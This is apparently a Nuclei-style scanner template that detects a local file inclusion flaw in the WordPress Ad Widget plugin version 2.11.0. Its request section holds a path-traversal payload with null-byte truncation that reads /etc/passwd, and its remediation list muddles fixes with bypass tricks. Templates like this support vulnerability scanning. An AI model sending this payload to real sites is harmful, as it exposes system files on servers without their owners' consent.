id: ad-widget-lfi
info:
  name: WordPress Plugin WordPress Ad Widget Local File Inclusion (2.11.0)
  author:
  - l0ne1y
  tags:
  - wordpress
  - wp-plugin
  - lfi
  description: |-
    Wordpress Plugin WordPress Ad Widget (2.11.0) local file inclusion vulnerability
    Ad Widget is an advertising plug-in for WordPress. After logging in to the backend, an attacker can trigger file inclusion vulnerabilities through a specially crafted URL request to read files and even execute code.
  reference:
  - https://cxsecurity.com/issue/wlb-2017100084
  - https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.com/zh-cn/install-plugins/

    Temporary fix:
    1. Use open_basedir configuration in PHP to restrict access to specified areas and truncate the path length.
    2. Filter. (dot)/(backslash)\\(backslash), encoding bypass
    3. Disable server remote file inclusion
    4. For the situation where the included file suffix is ​​restricted, the PHP version is less than 5.3, php.ini magic_quotes_gpc = off, and the addslashes function is not used for controllable parameters. If these three conditions are met, %00 truncation can be used.
    5. Question mark, pound sign, and space bypass (remote)
requests:
- matchers:
  - type: regex
    regex:
    - root:[x*]:0:0
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00'
  method: GET
